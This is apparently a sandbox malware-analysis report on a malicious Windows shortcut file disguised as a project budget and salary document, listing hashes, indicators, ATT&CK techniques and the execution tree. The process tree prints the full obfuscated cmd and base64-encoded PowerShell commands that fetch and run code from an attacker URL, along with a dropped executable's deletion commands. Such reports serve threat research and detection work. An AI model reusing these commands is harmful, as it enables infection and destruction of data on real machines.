d1e5ce4e97e3ca866aac57eb293c764f56eda897b7685fd689cba9cdf5505fb3

Analysis

max time kernel
152s
max time network
169s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
10-01-2024 16:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

11012024_0007_2 _ Project budget and candidate salary..lnk
Size

53KB
MD5

10369f2b0ad5c9899bbb48e39baeedae
SHA1

970fc66713a597c9059f31177ed9618472982c24
SHA256

d1e5ce4e97e3ca866aac57eb293c764f56eda897b7685fd689cba9cdf5505fb3
SHA512

ce4efa3bd1cf7752b8420b023d598ba156785b7d19303951dee845d46e6a645d2f1a93b397c3454fae51b120f7fa141c0a42c04aef6b9966e405759d39b9d8be
SSDEEP

192:8Tb+sFcaygd21iq2HOXt12Py86uAd+7dYkMQ776SVzFSAsQgHuCMswPaod:o9B/RtH0t12JLL+kMKbSAsN4Jyu

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://thietbiytebt.online/file/

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://thiet

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
22	964	powershell.exe
57	1664	powershell.exe
72	1664	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4476	svczHost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svczHost.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
964	powershell.exe
964	powershell.exe
2356	powershell.exe
2356	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
4476	svczHost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	964	powershell.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeIncreaseQuotaPrivilege	1664	powershell.exe
Token: SeSecurityPrivilege	1664	powershell.exe
Token: SeTakeOwnershipPrivilege	1664	powershell.exe
Token: SeLoadDriverPrivilege	1664	powershell.exe
Token: SeSystemProfilePrivilege	1664	powershell.exe
Token: SeSystemtimePrivilege	1664	powershell.exe
Token: SeProfSingleProcessPrivilege	1664	powershell.exe
Token: SeIncBasePriorityPrivilege	1664	powershell.exe
Token: SeCreatePagefilePrivilege	1664	powershell.exe
Token: SeBackupPrivilege	1664	powershell.exe
Token: SeRestorePrivilege	1664	powershell.exe
Token: SeShutdownPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeSystemEnvironmentPrivilege	1664	powershell.exe
Token: SeRemoteShutdownPrivilege	1664	powershell.exe
Token: SeUndockPrivilege	1664	powershell.exe
Token: SeManageVolumePrivilege	1664	powershell.exe
Token: 33	1664	powershell.exe
Token: 34	1664	powershell.exe
Token: 35	1664	powershell.exe
Token: 36	1664	powershell.exe
Token: SeIncreaseQuotaPrivilege	1664	powershell.exe
Token: SeSecurityPrivilege	1664	powershell.exe
Token: SeTakeOwnershipPrivilege	1664	powershell.exe
Token: SeLoadDriverPrivilege	1664	powershell.exe
Token: SeSystemProfilePrivilege	1664	powershell.exe
Token: SeSystemtimePrivilege	1664	powershell.exe
Token: SeProfSingleProcessPrivilege	1664	powershell.exe
Token: SeIncBasePriorityPrivilege	1664	powershell.exe
Token: SeCreatePagefilePrivilege	1664	powershell.exe
Token: SeBackupPrivilege	1664	powershell.exe
Token: SeRestorePrivilege	1664	powershell.exe
Token: SeShutdownPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeSystemEnvironmentPrivilege	1664	powershell.exe
Token: SeRemoteShutdownPrivilege	1664	powershell.exe
Token: SeUndockPrivilege	1664	powershell.exe
Token: SeManageVolumePrivilege	1664	powershell.exe
Token: 33	1664	powershell.exe
Token: 34	1664	powershell.exe
Token: 35	1664	powershell.exe
Token: 36	1664	powershell.exe
Token: SeIncreaseQuotaPrivilege	1664	powershell.exe
Token: SeSecurityPrivilege	1664	powershell.exe
Token: SeTakeOwnershipPrivilege	1664	powershell.exe
Token: SeLoadDriverPrivilege	1664	powershell.exe
Token: SeSystemProfilePrivilege	1664	powershell.exe
Token: SeSystemtimePrivilege	1664	powershell.exe
Token: SeProfSingleProcessPrivilege	1664	powershell.exe
Token: SeIncBasePriorityPrivilege	1664	powershell.exe
Token: SeCreatePagefilePrivilege	1664	powershell.exe
Token: SeBackupPrivilege	1664	powershell.exe
Token: SeRestorePrivilege	1664	powershell.exe
Token: SeShutdownPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeSystemEnvironmentPrivilege	1664	powershell.exe
Token: SeRemoteShutdownPrivilege	1664	powershell.exe
Token: SeUndockPrivilege	1664	powershell.exe
Token: SeManageVolumePrivilege	1664	powershell.exe
Token: 33	1664	powershell.exe
Token: 34	1664	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1664 wrote to memory of 1556	1664	cmd.exe	90
PID 1664 wrote to memory of 1556	1664	cmd.exe	90
PID 1556 wrote to memory of 964	1556	cmd.exe	92
PID 1556 wrote to memory of 964	1556	cmd.exe	92
PID 964 wrote to memory of 2356	964	powershell.exe	100
PID 964 wrote to memory of 2356	964	powershell.exe	100
PID 964 wrote to memory of 4364	964	powershell.exe	102
PID 964 wrote to memory of 4364	964	powershell.exe	102
PID 4364 wrote to memory of 1664	4364	cmd.exe	104
PID 4364 wrote to memory of 1664	4364	cmd.exe	104
PID 4476 wrote to memory of 4304	4476	svczHost.exe	116
PID 4476 wrote to memory of 4304	4476	svczHost.exe	116

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\11012024_0007_2 _ Project budget and candidate salary..lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1664
- C:\WINDOWS\system32\cmd.exe
  "C:\WINDOWS\system32\cmd.exe" /c set "PPgFUZmtkv=AbQAuAEMAb" && set "YjcmcVFgoZ=AXQA6ADoAR" && set "QRtJsBiiOR=AeABjAGUAc" && set "GkAJZBOhDq=QBiADIANQB" && set "ALkNjdNfBK=yAHQAXQA6A" && set "VNGsDWhTVb=AbQBCAGEAc" && set "RXKxbkfqhl=vAHMAdAAgA" && set "HjnGgZBlnA=AeAB0AC4AR" && set "XJtmpVuiIJ=dCommand J" && set "OaJiIMrBTH=uAC4ATQBlA" && set "QyevamEWXd=DoARgByAG8" && set "jEwUUPsykQ=ABwAGYAZgB" && set "UFkFSiDFQi=F0AOgA6AEE" && set "QaCNHpiKxM=QBVAHMAZQB" && set "gjCMGJaKgT=GkAIAAkAHU" && set "GhejGyBkOH=gAC0AVQByA" && set "DwyyeUicQg=pADsACgAkA" && set "BqmtOKzDYW=wA7AAoACQA" && set "PIrQzUyyYO=AYQB5AHUAe" && set "WUPrziAeJX=2AG8AawBlA" && set "sAGdtnxnlC=AUwBDAEkAS" && set "idzKMTvvYf=AAxADUAOwA" && set "daKRujHhsB=kAGkAbgBnA" && set "WHmVSLRenB=wBuAHYAZQB" && set "RrYYYXuatS=AawBPAFQAS" && set "lMfvMWVEtu=ACgAJAHQAc" && set "cYafXCtHyh=GkAbgBnACg" && set "YcQyoddWFR=KAAkAfQAKA" && set "YXERQgHPfq=AcwBpAG4AZ" && set "mOMeLddURm=AoAJAB2AGo" && set "rRmXhTLUDU=5AHMAdABlA" && set "YkXYwAeStL=CQAYwBvAHU" && set "ftSiDTgmIp=QBlAHMAdAA" && set "YMbxSTKPwE=GwATAAyAFo" && set "lTZXiJWMFG=pAG8AbgAgA" && set "tqYpTskImO=6AFoAagBjA" && set "mdpYwJAXCT=tAGcAdAAgA" && set "nUDLgdIEhW=EQATQB5AE0" && set "JKXpIRtQsA=CQAYwBvAG4" && set "HZOEMdmekx=DAAKQAKAHs" && set "JmnBQlCASz=gA9AFsAUwB" && set "IKqmTRWUCu=QBHAGwAbAB" && set "RtaxquJvUk=QBTAHQAYQB" && set "BhIYHCgKKU=EkASQAuAEc" && set "ivJSFOaIKK=hAG8AdgAgA" && set "bLCSchhQNA=nACgAWwBTA" && set "YRMgiaXaHG=GYAdgA9AFs" && set "xZHmYCeHTR=CsAIAAkAGw" && set "qcOSoFcmlk=wAoACIAYQB" && set "mRYekWydVk=HYAZQByAHQ" && set "IkAgROUgMf=gBNAFQARQB" && set "hUgkGNeSjm=G4AZwAoACI" && set "JhtUQXHUxx=wB0AGUAbQA" && set "WymiahIMbu=jAGgACgAJA" && set "MFXyJFtbtQ=Profile -" && set "ruSMFVtxyM=0AFMAdAByA" && set "HiaCRTxPiJ=NoLogo -No" && set "bMxcIKKhum=ABlAC0ASAB" && set "mjakxtbccK=AA7AAoACQA" && set "iStAOhbOGJ=G8AawBlAC0" && set "LzfzALLTBJ=GkAbABlACg" && set "itpdLNHYRx=AcgBpAG4AZ" && set "yEYmzLXCwF=DYANABTAHQ" && set "BDcrUGDRnp=QBuAGMAbwB" && set "mwPbCHoooy=2ACkAOwAKA" && set "HhgsarKMcg=e hidden -" && set "PqNIUQbuZP=QBjAGEAdAB" && set "pPPvcKezJk=gBnAF0AOgA" && set "JrmWBQfadg=olicy bypa" && set "YfCUanCCOp=WindowStyl" && set "zqpUfqyzZx=AcABiAEcAV" && set "DuOONevgvc=HkAcwB0AGU" && set "iXqutAKMSo=ACQB9AAoAC" && set "lhSAFxCRUG=TAHQAcgBpA" && set "tbncZvsbWS=ABsAGEAeQB" && set "RCuwqPhkbG=QAkAGMAbwB" && set "XYrNmIjMvo=AB0AGkAbwB" && set "nbaltDiMam=ARQB4AHAAc" && set "EbEhhPfVkE=AbwBkAGkAb" && set "bErueDVSOv=gBlAHMAcwB" && set "RCdFobrarV=FoAagBaAFc" && set "PdZJUCeddm=EgATQA2AEw" && set "ZLkjVrWsdh=HkAWQBqAGg" && set "vANaxbmYJF=gB5AHsACgA" && set "rfZNSJADGW=AcgBpACAAL" && set "nFkxBIgMZd=HsACgAJAAk" && set "MqwvArAXBC=IAFIAMABjA" && set "JiLQVELhll=ABlAG0ALgB" && set "sJhltJBror=zAGEAVwA1A" && set "HOEBggqkgB=QBuAHQAIAA" && set "zksGeQVaHI=start /min" && set "lkxlCwPgXT=AeQA5ADAAY" && set "FOcsIIRFbK=H0ACgA=" && set "VTkAxyGkTW=AYwBIAE0Ad" && set "jHohvcBcrn=1AG4AdAAgA" && set "vXruNOzqeh=AUwB5AHMAd" && set "YkptWaFgqq=AWQA1AFkAV" && set "wuWpJHCYnN=AZQB0AFMAd" && set "bXCqnLXHJA=AZQAKAAkAC" && set "MuVPQvXjvm=AWwBTAHkAc" && set "xruqxCcDzm=C4ARQBuAGM" && set "rNqeSyPUsC=GwAZQBlAHA" && set "SubLdvUNPh=JAEkAbgB2A" && set "QLNSTizvBg=ExecutionP" && set "wbLYTUtUbb=ABCAGgAWQB" && set "lbrQEmeALa=APQAgACgAJ" && set "nJwpImdfYM=kAEcASgBwA" && set "jFwcEtSpnR=QAgADEAMAA" && set "VzjanMGwoc=gByAG8AbQB" && set "yswfKrOuss=6AEEAUwBDA" && set "wmTekGRueW=AUgBlAHEAd" && set "VtgPaSioJT=CAGEAcwBlA" && set "fBWgosOUtc=AJABjAG8Ad" && set "QzEfjpqWqn=G0ALgBUAGU" && set "GWAmacSQQl=AB2AGoAagB" && set "DLSRKCphUZ=UAGUAeAB0A" && set "LWVtetnChA= "" powers" && set "UmaIqzYTmz=G8AbgB0AGU" && set "qBKWATCNri=AbgB0ACAAP" && set "jVpwvJUykz=yAHQALQBTA" && set "TvgOXAhqrX=GMAUABhAHI" && set "GwgtDqHbLn=JAGIAcgBlA" && set "RnuFEuuEad=QAgAEkAbgB" && set "OVDhyglOgK=AbgB0ACAAP" && set "xCUoOlFzxP=AByAGkAbgB" && set "ffrzcCxaSP=iACkAKQA7A" && set "fGGwPVRfCU=CAGEAcwBpA" && set "XdPTbpVAPR=XAFoAaABPA" && set "oXYeXWaqkz=VAHcATwBEA" && set "mrSTCdEtwR=wBlADYANAB" && set "IxZpYUuvrG=QBuAEIAbgA" && set "RYLYRbungc=HUAcgBpACA" && set "GUjxyUrRts=AVwByAGkAd" && set "dtMjQXnkcn=C0AVwBlAGI" && set "FjkzPZGyyt=7AAoAdwBoA" && set "SQsAuIaaOc=JAAkAJABjA" && set "pGNCxuepcj=hell.exe -" && set "qTZUcPReMu=AagBVAHUAY" && set "NLHBMSmNoj=QB2ACIAKQA" && set "CBeKvLhjFR=AIAAtAHMAI" && set "kfAnidgwSF=GEAawA7AAo" && set "KpuWiboPKf=CQAXwAuAEU" && set "vUwpwZEbez=HMAcwBhAGc" && set "miNDfDAYwk=AdABlAG4Ad" && set "AtYmadsJpQ=1AHgAcABmA" && set "eiHVmRytUW=C0APQAgADE" && set "UZOzANzDdG=uAEMAbwBuA" && set "AZjZYBTkSe=GUAWABSAGw" && set "xQOvjPVoMl=AagBhAG8Ad" && set "LzIajGywmW=QAuAEcAZQB" && set "OKRtPTAaYG=AOwAKAAkAC" && set "BuZHTeNMQd=AWQBuAFEAd" && set "QNteCcjIJv=ss -Encode" && set "SYgdTFUUGe=QAxAE4ARAB" && call %zksGeQVaHI%%LWVtetnChA%%pGNCxuepcj%%YfCUanCCOp%%HhgsarKMcg%%HiaCRTxPiJ%%MFXyJFtbtQ%%QLNSTizvBg%%JrmWBQfadg%%QNteCcjIJv%%XJtmpVuiIJ%%tbncZvsbWS%%AtYmadsJpQ%%YRMgiaXaHG%%vXruNOzqeh%%JiLQVELhll%%DLSRKCphUZ%%xruqxCcDzm%%EbEhhPfVkE%%pPPvcKezJk%%yswfKrOuss%%BhIYHCgKKU%%wuWpJHCYnN%%xCUoOlFzxP%%bLCSchhQNA%%DuOONevgvc%%PPgFUZmtkv%%WHmVSLRenB%%ALkNjdNfBK%%QyevamEWXd%%VNGsDWhTVb%%mrSTCdEtwR%%lhSAFxCRUG%%hUgkGNeSjm%%VTkAxyGkTW%%IkAgROUgMf%%tqYpTskImO%%ZLkjVrWsdh%%RrYYYXuatS%%SYgdTFUUGe%%oXYeXWaqkz%%RCdFobrarV%%YkptWaFgqq%%wbLYTUtUbb%%XdPTbpVAPR%%nUDLgdIEhW%%qTZUcPReMu%%IxZpYUuvrG%%ffrzcCxaSP%%mOMeLddURm%%xQOvjPVoMl%%JmnBQlCASz%%rRmXhTLUDU%%QzEfjpqWqn%%HjnGgZBlnA%%BDcrUGDRnp%%daKRujHhsB%%UFkFSiDFQi%%sAGdtnxnlC%%LzIajGywmW%%ruSMFVtxyM%%cYafXCtHyh%%MuVPQvXjvm%%JhtUQXHUxx%%UZOzANzDdG%%mRYekWydVk%%YjcmcVFgoZ%%VzjanMGwoc%%VtgPaSioJT%%yEYmzLXCwF%%itpdLNHYRx%%qcOSoFcmlk%%MqwvArAXBC%%PdZJUCeddm%%lkxlCwPgXT%%IKqmTRWUCu%%nJwpImdfYM%%AZjZYBTkSe%%BuZHTeNMQd%%GkAJZBOhDq%%sJhltJBror%%YMbxSTKPwE%%zqpUfqyzZx%%NLHBMSmNoj%%DwyyeUicQg%%RYLYRbungc%%lbrQEmeALa%%GWAmacSQQl%%ivJSFOaIKK%%xZHmYCeHTR%%PIrQzUyyYO%%jEwUUPsykQ%%mwPbCHoooy%%YkXYwAeStL%%qBKWATCNri%%jFwcEtSpnR%%FjkzPZGyyt%%LzfzALLTBJ%%fBWgosOUtc%%HOEBggqkgB%%mdpYwJAXCT%%HZOEMdmekx%%lMfvMWVEtu%%vANaxbmYJF%%SQsAuIaaOc%%UmaIqzYTmz%%OVDhyglOgK%%RnuFEuuEad%%WUPrziAeJX%%dtMjQXnkcn%%wmTekGRueW%%ftSiDTgmIp%%GhejGyBkOH%%gjCMGJaKgT%%rfZNSJADGW%%QaCNHpiKxM%%fGGwPVRfCU%%TvgOXAhqrX%%YXERQgHPfq%%BqmtOKzDYW%%SubLdvUNPh%%iStAOhbOGJ%%nbaltDiMam%%bErueDVSOv%%lTZXiJWMFG%%JKXpIRtQsA%%miNDfDAYwk%%mjakxtbccK%%GwgtDqHbLn%%kfAnidgwSF%%iXqutAKMSo%%PqNIUQbuZP%%WymiahIMbu%%nFkxBIgMZd%%GUjxyUrRts%%bMxcIKKhum%%RXKxbkfqhl%%KpuWiboPKf%%QRtJsBiiOR%%XYrNmIjMvo%%OaJiIMrBTH%%vUwpwZEbez%%bXCqnLXHJA%%RCuwqPhkbG%%jHohvcBcrn%%eiHVmRytUW%%OKRtPTAaYG%%RtaxquJvUk%%jVpwvJUykz%%rNqeSyPUsC%%CBeKvLhjFR%%idzKMTvvYf%%YcQyoddWFR%%FOcsIIRFbK%
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABsAGEAeQB1AHgAcABmAGYAdgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYwBIAE0AdgBNAFQARQB6AFoAagBjAHkAWQBqAGgAawBPAFQASQAxAE4ARABVAHcATwBEAFoAagBaAFcAWQA1AFkAVABCAGgAWQBXAFoAaABPAEQATQB5AE0AagBVAHUAYQBuAEIAbgAiACkAKQA7AAoAJAB2AGoAagBhAG8AdgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADAAYQBHAGwAbABkAEcASgBwAGUAWABSAGwAWQBuAFEAdQBiADIANQBzAGEAVwA1AGwATAAyAFoAcABiAEcAVQB2ACIAKQApADsACgAkAHUAcgBpACAAPQAgACgAJAB2AGoAagBhAG8AdgAgACsAIAAkAGwAYQB5AHUAeABwAGYAZgB2ACkAOwAKACQAYwBvAHUAbgB0ACAAPQAgADEAMAA7AAoAdwBoAGkAbABlACgAJABjAG8AdQBuAHQAIAAtAGcAdAAgADAAKQAKAHsACgAJAHQAcgB5AHsACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AAoACQAJAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAA7AAoACQAJAGIAcgBlAGEAawA7AAoACQB9AAoACQBjAGEAdABjAGgACgAJAHsACgAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQAKAAkACQAkAGMAbwB1AG4AdAAgAC0APQAgADEAOwAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwAKAAkAfQAKAH0ACgA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2356
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABsAG4AcwBkAHcAegBjAHIAaQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAWQBtAGwANQBkAEcAVgBpAGQAQwA1AHYAYgBtAHgAcABiAG0AVQB2AFoAbQBsAHMAWgBTADkAdwBjAHkAOQBqAE4AagBOAGsATwBHAFEANQBZAGoAbABsAE0AagBOAGkATwBUAEoAaQBNAG0ATgBpAE0AegBsAGwAWgBHAFoAawBOADIATQA0AE8AVABjADEAWgBpADUAcQBjAEcAYwA9ACIAKQApADsACgAkAHkAcwB3AHcAdgBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAMABhAEcAbABsAGQAQQA9AD0AIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAHkAcwB3AHcAdgBjACAAKwAgACQAbABuAHMAZAB3AHoAYwByAGkAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkAdAByAHkAewAKAAkACQAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGkAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABjAG8AbgB0AGUAbgB0ADsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AAoACQAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADEANQA7AAoACQB9AAoAfQAKAA==
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4364
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABsAG4AcwBkAHcAegBjAHIAaQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAWQBtAGwANQBkAEcAVgBpAGQAQwA1AHYAYgBtAHgAcABiAG0AVQB2AFoAbQBsAHMAWgBTADkAdwBjAHkAOQBqAE4AagBOAGsATwBHAFEANQBZAGoAbABsAE0AagBOAGkATwBUAEoAaQBNAG0ATgBpAE0AegBsAGwAWgBHAFoAawBOADIATQA0AE8AVABjADEAWgBpADUAcQBjAEcAYwA9ACIAKQApADsACgAkAHkAcwB3AHcAdgBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAMABhAEcAbABsAGQAQQA9AD0AIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAHkAcwB3AHcAdgBjACAAKwAgACQAbABuAHMAZAB3AHoAYwByAGkAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkAdAByAHkAewAKAAkACQAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGkAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABjAG8AbgB0AGUAbgB0ADsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AAoACQAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADEANQA7AAoACQB9AAoAfQAKAA==
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1664

C:\Windows\Temp\svczHost.exe
C:\Windows\Temp\svczHost.exe quyet
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4476
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
  2⤵
  PID:4304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
888d777e7e7e6fda7b28caa8897d29da

SHA1
55f7f81ea907f83f5323f094d8a12c85ea71dd63

SHA256
6bb886d12c536ce09af784fa18552bbf31aa628dddf9ff7d73060f96e69d7e4c

SHA512
c328b3ffd26acb0b2386c3926bbe4e12926aa54d8b5686bb004d2b611768481e79e8b0529150801a191d716837f24b8cf36db4faf4dbfec9c1b2bb466343811d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
702a7d2914e437c753d97503ebc80583

SHA1
a784ee3224f8b2fc2d4067657f3b4841b1287998

SHA256
25ecc79d7f0b13719d3673f9115552c889830270597496043d61393fd5f48e98

SHA512
360fdcd91d1b684e485b933fb5eba1dd3d4e42cbd84f8de2e980a0c8ecea26c4e4cd953ef63c0168018fac0a6469e5a76cfb0a70bfd1504ffc49d9d97e435f68

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gut2yunk.0lz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
8be2befd1674b20ced14bc07feae700a

SHA1
67db10204c2c74547636a285529547842d477144

SHA256
46c2f93dcae0d49aedacc0451d468d12418d68dbc954a82f15fea41ab0624def

SHA512
e0ada1257134212de96d9c5848e7e3d4fc6afe629506aa69328aae737548ff882912d7d4e5a49d6b8bfcf10a3fce51343900f38fe3e0a1e87ab4b463f46dd93d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
2785e355382b67494d69b8f2dbe1c144

SHA1
fb689cd06c2da9d47b509920927f9b8910689aa3

SHA256
5023e08f9bdebb6eb7b72dcd680b8bec0d950e0cfde9e42b280e3d9f67adc5d0

SHA512
